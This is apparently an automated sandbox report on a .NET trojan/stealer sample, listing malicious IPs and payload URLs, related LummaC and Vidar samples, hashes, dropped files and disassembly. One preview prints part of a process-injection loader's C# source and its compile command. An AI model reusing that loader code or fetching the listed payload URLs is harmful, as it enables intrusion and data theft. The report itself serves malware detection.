                                                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@8/7@11/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 98%
                                                                                        • Number of executed functions: 47
                                                                                        • Number of non-executed functions: 95
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: nlJ2sNaZVi.exe
                                                                                        TimeTypeDescription
                                                                                        02:08:19API Interceptor1x Sleep call for process: nlJ2sNaZVi.exe modified
                                                                                        02:08:22API Interceptor8x Sleep call for process: RegAsm.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        147.45.44.131TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                                                                                        • 147.45.44.131/infopage/tbg9.exe
                                                                                        7IXl1M9JGV.exeGet hashmaliciousLummaCBrowse
                                                                                        • 147.45.44.131/infopage/tbg9.exe
                                                                                        7IXl1M9JGV.exeGet hashmaliciousUnknownBrowse
                                                                                        • 147.45.44.131/infopage/bhdh552.ps1
                                                                                        Rechnung_643839483.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 147.45.44.131/infopage/cdeea.exe
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 147.45.44.131/files/gqgqg.exe
                                                                                        AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                                                                        • 147.45.44.131/files/tpgl053.exe
                                                                                        ptgl503.exeGet hashmaliciousLummaCBrowse
                                                                                        • 147.45.44.131/files/gpto03.exe
                                                                                        Suselx1.exeGet hashmaliciousLummaCBrowse
                                                                                        • 147.45.44.131/files/g5.exe
                                                                                        gkqg90.ps1Get hashmaliciousLummaCBrowse
                                                                                        • 147.45.44.131/files/otqp9.exe
                                                                                        test.batGet hashmaliciousMicroClipBrowse
                                                                                        • 147.45.44.131/files/tpgl053.exe
                                                                                        188.114.96.3Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                        • www.rtpwslot888gol.sbs/7arg/
                                                                                        Yeni sipari#U015f _TR-59647-WJO-001.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • paste.ee/d/lmTya
                                                                                        View Pdf Doc_1c854e0875fca437af9ba7046d2f6712.htmGet hashmaliciousUnknownBrowse
                                                                                        • zy8wq.nhgrt.top/DydymQ/31zY8wQ31?&&r4n=Z2FicmllbGUuY29uZ2Vkb0BnZi5jb20%3D
                                                                                        View Pdf Doc_8a3c334133bfb9605fc344b2f764ac62.htmGet hashmaliciousUnknownBrowse
                                                                                        • 4je3f.nhgrt.top/V0afhB/154jE3f15?&&wVd=dGFoZXIubWFuc29vckB5YXNtYXJpbmEuYWU%3D
                                                                                        8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • lysyvan.com/login.php
                                                                                        7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • qegyhig.com/login.php
                                                                                        UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • qegyhig.com/login.php
                                                                                        1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • lysyvan.com/login.php
                                                                                        arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • qegyhig.com/login.php
                                                                                        Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • qegyhig.com/login.php
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        marshal-zhukov.comLoader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                        • 188.114.96.3
                                                                                        steamcommunity.comLoader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 23.197.127.21
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 23.67.133.187
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 23.67.133.187
                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 23.210.122.61
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 23.197.127.21
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 23.192.247.89
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 23.192.247.89
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 23.192.247.89
                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 23.192.247.89
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSOrder88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 188.114.97.3
                                                                                        Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.55
                                                                                        01. MT JS JIANGYIN Ship Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 104.26.12.205
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.55
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.174.133
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.135.233
                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 172.64.41.3
                                                                                        ESTEEM ASTRO PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 172.67.74.152
                                                                                        file.exeGet hashmaliciousCStealerBrowse
                                                                                        • 162.159.134.233
                                                                                        AKAMAI-ASUSfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 184.28.89.167
                                                                                        qkbfi86.elfGet hashmaliciousMiraiBrowse
                                                                                        • 23.219.94.247
                                                                                        dvwkja7.elfGet hashmaliciousMiraiBrowse
                                                                                        • 96.16.0.147
                                                                                        http://bit.ly/UCEMPLGet hashmaliciousUnknownBrowse
                                                                                        • 2.19.225.207
                                                                                        sbafla - John Bradley your alert(s) workspace - to review - 11132024.msgGet hashmaliciousUnknownBrowse
                                                                                        • 2.19.126.160
                                                                                        https://deltacapitalgroup.us11.list-manage.com/track/click?u=bf383f7aa25923d377aaa8ae2&id=d3424d590b&e=95f75804b2Get hashmaliciousUnknownBrowse
                                                                                        • 104.102.19.45
                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 23.47.51.183
                                                                                        Launcher 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.47.51.164
                                                                                        Demande de proposition du Groupe Esp#U00e9rance et Cancer[45838].pdfGet hashmaliciousUnknownBrowse
                                                                                        • 96.6.160.189
                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 23.47.50.136
                                                                                        FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                        • 147.45.47.61
                                                                                        file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                        • 147.45.47.61
                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                        • 147.45.47.61
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 147.45.47.61
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 147.45.47.61
                                                                                        fefbBqMKcU.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 147.45.44.212
                                                                                        yh5At5T1Zs.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 147.45.44.212
                                                                                        arm7.elfGet hashmaliciousUnknownBrowse
                                                                                        • 193.233.193.45
                                                                                        Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                                                                                        • 147.45.47.61
                                                                                        Pr6Fu6VZK3.exeGet hashmaliciousUnknownBrowse
                                                                                        • 147.45.47.61
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        • 188.114.96.3
                                                                                        uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.102.49.254
                                                                                        • 188.114.96.3
                                                                                        uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.102.49.254
                                                                                        • 188.114.96.3
                                                                                        c39-EmprisaMaldoc.rtfGet hashmaliciousUnknownBrowse
                                                                                        • 104.102.49.254
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 104.102.49.254
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        • 188.114.96.3
                                                                                        No context
                                                                                        Process:C:\Users\user\Desktop\nlJ2sNaZVi.exe
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):847
                                                                                        Entropy (8bit):5.345615485833535
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                        Malicious:true
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Nov 14 09:05:52 2024, 1st section name ".debug$S"
                                                                                        Category:dropped
                                                                                        Size (bytes):1336
                                                                                        Entropy (8bit):3.96465342191833
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Hcim9p4QPHFwKTFexmfwI+ycuZhNOkakShpPNnqSSd:UVPGKTAxmo1ulOka3hLqSC
                                                                                        MD5:FFA178C533324E44D32C7CB21CD41888
                                                                                        SHA1:6CFF474AA3DC237DA9CF5366B866B3FFB348ED0A
                                                                                        SHA-256:65E8828DBF35A9ACDE8A814AD7C7751C477F4A69D5A7BE4D50A7597C8D6A1115
                                                                                        SHA-512:B45E23E65F07560FBED9BAFA28FB0633312B080E0825544C5D49A346DD0617A8772579F493C76D0F1A2DAD88317E6918120DD22907C0B91E682E8769A8F9CDC0
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:L...p.5g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP..................o...qY9.l................5.......C:\Users\user\AppData\Local\Temp\RESBEB5.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.0.t.1.l.0.c.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                        File Type:MSVC .res
                                                                                        Category:dropped
                                                                                        Size (bytes):652
                                                                                        Entropy (8bit):3.080307436975029
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryETkak7YnqqlTpPN5Dlq5J:+RI+ycuZhNOkakShpPNnqX
                                                                                        MD5:6F941DFC715939186CF6BEEA089ADF87
                                                                                        SHA1:2241C1BFCA44329F5368A40FB75CC85AD08304B4
                                                                                        SHA-256:B2B01414E097AFC217392FECF35670B99C6DBD336AB6AAE287170C54A05F5A9B
                                                                                        SHA-512:7D0E9A87F79319CD06E43EC57B2FBCBEFF002D27AFC290B471E60C82B9F860021314F0FA7A71ECF782ED5655F39CF69D6A676F943FF79920481420843D1472AE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.0.t.1.l.0.c.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.0.t.1.l.0.c.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                        Process:C:\Users\user\Desktop\nlJ2sNaZVi.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):10583
                                                                                        Entropy (8bit):4.487855797297623
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                                                        MD5:B022C6FE4494666C8337A975D175C726
                                                                                        SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                                                        SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                                                        SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                                        Process:C:\Users\user\Desktop\nlJ2sNaZVi.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):206
                                                                                        Entropy (8bit):4.9655435506699055
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:0HXEXA8F+H2R5BJiWR5mKWLRRUkh4E2J5xAI4iUjQ+iQCIFRVRMxTPIUkh4E2J5v:pAu+H2L/6K2923f4fM+zxszI923f4f09
                                                                                        MD5:DE34C14306794294EFD27B3DEDE59A38
                                                                                        SHA1:2D6C87CADBFB645279AD6F3BB3243BBC07FF15CB
                                                                                        SHA-256:87BBE4520E8501598B24625360568F3318904A276E67B6717C26165914B6506E
                                                                                        SHA-512:A93B674443268CD9ACE58754129C1699E649280B13107185C78DF61F6F2DB151C8747F26C3ED5D691365B2491463DB14B36EFF0A5DFBC2F7A4E9B702309DDA49
                                                                                        Malicious:true
                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.0.cs"
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):8704
                                                                                        Entropy (8bit):4.659432177901728
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:0CaQHf9WDa/u6YRj2ca4Uxd5Mq5eNcU9h:3WDlV95x05MqIyU9h
                                                                                        MD5:28F9F326DCC6DE0877CA6330BF37E9E5
                                                                                        SHA1:3D49623193D2EA4C6A2A85E4E599656E1AE1FDDD
                                                                                        SHA-256:3C53B96D796C75AB88F6D1E084C6B407ED63F5ACBA26B22722546B7D1A2F3CD7
                                                                                        SHA-512:2E61452F5433BDED7BC724FE0B9F6F07E9D55D698348CA46EAE05C166F3F7EAA6CF3F2C2C69B2325DDDB2683F991EE4A1D231507F38B16831F3A3A1B4768248B
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p.5g...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......
                                                                                        Process:C:\Users\user\Desktop\nlJ2sNaZVi.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):705
                                                                                        Entropy (8bit):5.212788285979691
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:KMi/qR37L/6KzT+wmKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoqdn6Kz/mKax5DqBVKVrdFAMBJTH
                                                                                        MD5:01B221337C0A0BF1C3638F0757EB0ED1
                                                                                        SHA1:02DC9D211E61C33C88DCC33B97DA6BBD176D25B0
                                                                                        SHA-256:FB15AED4CC6A6E7457FE8FD3F8BBB47B197069431F94E4BB6C714A6F2460755D
                                                                                        SHA-512:0E68F51D7AD6E8DA90B72E212F89EDFB7FE82C12CED00C1BF09DAE431706811C22DB066DE7BFEE10896934089026FD03E802660798575359872CA9273BA170A0
                                                                                        Malicious:false
                                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):3.896660573459071
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:nlJ2sNaZVi.exe
                                                                                        File size:45'056 bytes
                                                                                        MD5:5e443f31b2cf8b956afec50ad5c0f839
                                                                                        SHA1:206caac0c2d6e47246f0c3df16fa5c72172e6bfd
                                                                                        SHA256:abe7949458ebfbdb53ad04c602bca49e30f346431b730a005c0ff3c59e06538e
                                                                                        SHA512:9d180624e9ab617756f52cba7507bc9427f2d1d96871ea3cb14e26cd89ff9f5df3198d7d5caa66f423865e534c5cacfce4dc5686ddf11b16d6f843615117a6e3
                                                                                        SSDEEP:768:+FtchgNSVwafevGHkiV++I1gqDnJuuAuznQVLNvxu0BvkwIt6BcN4feOq:+FtggN7aeGEk+11Tu9AnQVLNppvk9RND
                                                                                        TLSH:2313595171FE9029D5BBEBB5BEDDACEDD89E5971182C246700C1928B4B21FE0EA43C34
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j-..........."...0.............j.... ........@.. ....................... ............`................................
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x40c36a
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xBE2D6ACE [Sun Feb 8 18:58:22 2071 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc3180x4f.text
